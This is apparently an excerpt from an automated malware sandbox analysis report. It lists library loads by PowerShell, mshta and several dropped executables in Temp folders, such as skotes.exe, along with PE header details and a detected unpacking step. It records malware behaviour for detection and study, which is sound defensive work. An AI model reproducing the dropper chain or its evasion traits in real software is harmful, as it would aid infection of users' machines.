                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: mstask.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: dui70.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: duser.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: chartv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: oleacc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: atlthunk.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: textinputframework.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: coreuicomponents.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: coremessaging.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: wtsapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: winsta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: textshaping.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: windows.fileexplorer.common.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: explorerframe.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXESection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: webio.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: dpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: ntmarta.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeSection loaded: windowscodecs.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: webio.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: dpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                            Source: tmp35.tmp.21.drLNK file: ..\..\..\..\..\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                            Source: random.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                            Source: random.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                            Source: random.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                            Source: random.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: random.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                            Source: random.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                            Source: random.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: Q.Core.pdb source: powershell.exe, 00000009.00000002.2271100545.0000018B6F2AB000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\dll\mscorlib.pdb|s8o source: powershell.exe, 00000009.00000002.2271100545.0000018B6F2AB000.00000004.00000020.00020000.00000000.sdmp
                            Source: random.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                            Source: random.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                            Source: random.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                            Source: random.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                            Source: random.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                            Data Obfuscation

                            barindex
                            Detected unpacking (changes PE section rights)
                            Source: C:\Users\user\AppData\Local\Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXEUnpacked PE file: 11.2.Temp8WMDJ3BJ1HEGEWEDLFTLEWRVXCIZEQKZ.EXE.b80000.0.unpack :EW;.rsrc:W;.idata :W;mqertzmi:EW;jvsnxutt:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;mqertzmi:EW;jvsnxutt:EW;.taggant:EW;
